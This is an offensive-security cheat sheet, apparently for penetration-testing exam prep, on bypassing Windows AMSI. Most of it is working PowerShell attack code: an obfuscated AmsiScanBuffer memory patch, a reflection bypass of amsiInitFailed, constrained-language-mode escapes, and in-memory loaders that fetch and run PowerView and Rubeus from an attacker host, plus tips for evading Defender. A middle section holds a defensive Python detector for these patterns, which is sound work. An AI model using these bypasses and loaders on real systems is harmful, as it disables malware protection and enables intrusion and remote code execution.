
AMSI Bypass Techniques (2026)

Working PowerShell AMSI patches, memory patching via reflection, constrained language mode bypass, and loading offensive tools without triggering Windows Defender.

What AMSI Does

AMSI (Antimalware Scan Interface) hooks into PowerShell, VBScript, JScript, and other script engines. It passes script content to the registered AV provider before execution, and Windows Defender uses it to block known malicious scripts. In the techniques below, bypassing AMSI means making the amsi.dll AmsiScanBuffer call always yield a "clean" (not detected) result, either by patching the function in memory or by flipping PowerShell's internal amsiInitFailed flag so the scan is skipped altogether.

Memory Patch (Direct)

# Classic AmsiScanBuffer patch: makes the call return 0x80070057 (E_INVALIDARG) immediately, so nothing is ever scanned or reported as detected
# Obfuscated to avoid detection: the function name is concatenated at runtime

$a = 'Ams'; $b = 'iSca'; $c = 'nBuf'; $d = 'fer'
$AmsiFunc = $a + $b + $c + $d

Add-Type -MemberDefinition @"
  [DllImport("kernel32")]
  public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
  [DllImport("kernel32")]
  public static extern IntPtr LoadLibrary(string name);
  [DllImport("kernel32")]
  public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
"@ -Name WinAPI -Namespace System
$hModule = [WinAPI]::LoadLibrary("amsi.dll")
$pAddr = [WinAPI]::GetProcAddress($hModule, $AmsiFunc)
$oldProt = 0
[WinAPI]::VirtualProtect($pAddr, [uint32]5, 0x40, [ref]$oldProt) | Out-Null
$patch = [byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)  # mov eax, 0x80070057; ret
[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $pAddr, 6)

Reflection-Based Bypass (simpler)

# Targets amsiInitFailed field directly
# Split strings to evade signature detection
$a=[Ref].Assembly.GetType('System.Management.Automation.'+[char]65+'msiUtils')
$b=$a.GetField('amsi'+'InitFailed','NonPublic,Static')
$b.SetValue($null,$true)

Note: These exact strings are flagged by Defender. Obfuscate strings (base64, reverse, concat) before execution. Also note that modern Windows builds with CFG (Control Flow Guard) enabled can break AmsiScanBuffer memory patches; consider reflection or CLM bypasses.

Constrained Language Mode Bypass

# Check current language mode
$ExecutionContext.SessionState.LanguageMode

# Bypass via PSv2 (if available)
powershell -version 2

# Bypass via custom runspace
$rs = [RunspaceFactory]::CreateRunspace()
$rs.Open()
$rs.SessionStateProxy.LanguageMode = 'FullLanguage'
$ps = [PowerShell]::Create()
$ps.Runspace = $rs
$ps.AddScript('whoami').Invoke()

In-Memory Loader Pattern

# Download and execute without touching disk
# First: bypass AMSI (above), then:

# Download to memory and execute (IEX)
IEX (New-Object Net.WebClient).DownloadString('http://KALI_IP/PowerView.ps1')

# Or via reflection (avoids IEX detection)
$bytes = (New-Object Net.WebClient).DownloadData('http://KALI_IP/Rubeus.exe')
$asm = [System.Reflection.Assembly]::Load($bytes)
[Rubeus.Program]::Main(@("kerberoast"))
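From the detection side, the note above is the interesting point: the string-splitting tricks used in the memory patch, the reflection bypass and the loader pattern are all visible in PowerShell script-block logging (Event ID 4104), and the splitting itself is easy to undo. The following is an added example, not code from the original page: a small Python normaliser that resolves [char]NN casts, literal-string variables and 'a'+'b' concatenation, then checks the result against indicators drawn from the snippets on this page. The sample script blocks, the indicator names and the EXAMPLE_HOST URL are constructed for the example.

```python
"""Normalise obfuscated PowerShell script blocks and flag the AMSI-tamper and
in-memory-loader indicators discussed on this page.  Added example: the input
is constructed script-block text of the kind Event ID 4104 logs carry."""
import re

# --- normalisation: undo the obfuscation the snippets above rely on ---------
_CHAR_CAST = re.compile(r"\[char\]\s*(\d+)", re.IGNORECASE)          # [char]65 -> 'A'
_LITERAL_ASSIGN = re.compile(r"\$(\w+)\s*=\s*(['\"])([^'\"]*)\2")   # $a = 'Ams'
_STR_CONCAT = re.compile(r"(['\"])([^'\"]*)\1\s*\+\s*(['\"])([^'\"]*)\3")  # 'a' + 'b'


def _fold_concats(text: str) -> str:
    """Collapse 'a' + 'b' into 'ab' repeatedly until nothing changes."""
    while True:
        folded = _STR_CONCAT.sub(lambda m: f"'{m.group(2)}{m.group(4)}'", text)
        if folded == text:
            return text
        text = folded


def normalize(script: str) -> str:
    """Resolve [char] casts, inline literal-string variables, fold concatenation."""
    text = _CHAR_CAST.sub(lambda m: f"'{chr(int(m.group(1)))}'", script)
    for _ in range(4):  # bounded: each pass can expose a new literal assignment
        before = text
        for name, _quote, value in _LITERAL_ASSIGN.findall(text):
            text = re.sub(r"\$" + re.escape(name) + r"\b",
                          lambda _m, v=value: f"'{v}'", text)
        text = _fold_concats(text)
        if text == before:
            break
    return text


# Indicator names are constructed for this example; the patterns come from the
# snippets on this page.
INDICATORS = {
    "amsi_scan_buffer_reference": re.compile(r"AmsiScanBuffer", re.I),
    "amsi_dll_loaded": re.compile(r"LoadLibrary\s*\(\s*['\"]amsi\.dll", re.I),
    "memory_protection_change": re.compile(r"VirtualProtect\b", re.I),
    "amsi_utils_reflection": re.compile(r"Automation\.AmsiUtils", re.I),
    "amsi_init_failed_field": re.compile(r"amsiInitFailed", re.I),
    "download_cradle": re.compile(r"\.(DownloadString|DownloadData)\s*\(", re.I),
    "reflective_assembly_load": re.compile(r"Reflection\.Assembly\]::Load\s*\(", re.I),
    "runspace_language_mode_override": re.compile(r"LanguageMode\s*=\s*['\"]FullLanguage", re.I),
}


def scan_script_block(script: str) -> list[str]:
    """Return the sorted indicator names present once the block is normalised."""
    text = normalize(script)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


# Constructed sample script blocks: three mirror the obfuscated snippets above,
# the last is benign and must produce no hits.
SAMPLES = {
    "memory_patch": (
        "$a = 'Ams'; $b = 'iSca'; $c = 'nBuf'; $d = 'fer'\n"
        "$AmsiFunc = $a + $b + $c + $d\n"
        '$hModule = [WinAPI]::LoadLibrary("amsi.dll")\n'
        "$pAddr = [WinAPI]::GetProcAddress($hModule, $AmsiFunc)\n"
        "[WinAPI]::VirtualProtect($pAddr, [uint32]5, 0x40, [ref]$oldProt)\n"
    ),
    "reflection": (
        "$a=[Ref].Assembly.GetType('System.Management.Automation.'+[char]65+'msiUtils')\n"
        "$b=$a.GetField('amsi'+'InitFailed','NonPublic,Static')\n"
        "$b.SetValue($null,$true)\n"
    ),
    "loader": (
        "IEX (New-Object Net.WebClient).DownloadString('http://EXAMPLE_HOST/tool.ps1')\n"
        "$bytes = (New-Object Net.WebClient).DownloadData('http://EXAMPLE_HOST/tool.exe')\n"
        "$asm = [System.Reflection.Assembly]::Load($bytes)\n"
    ),
    "benign": "Get-ChildItem -Path 'C:\\logs' | Where-Object { $_.Length -gt 1MB }\n",
}

if __name__ == "__main__":
    for label, block in SAMPLES.items():
        print(f"{label:13s} -> {scan_script_block(block) or 'no indicators'}")
```

The normaliser only handles the three tricks shown on this page (character casts, literal variables, concatenation); it does not decode base64 or reversed strings, which is why script-block logging should be paired with AMSI's own telemetry rather than relied on alone. The bounded resolution loop matters for the memory-patch sample: the first pass inlines $a..$d and folds them into one literal, and only the second pass can then inline $AmsiFunc where it is used.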

Exam Tips

  • Always check if AMSI is the problem: [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); if this errors, AMSI is blocking even this
  • Use base64 encoded commands to get past initial filters: powershell -enc <b64>
  • For CPTS exam environment: Defender may already be disabled on lab machines; test first before wasting time on bypass
  • Tools like Invoke-Obfuscation and AMSI.fail website generate fresh bypasses automatically
  • If PowerShell is fully blocked, try cmd.exe with WMIC, certutil, or BITSAdmin for download/execute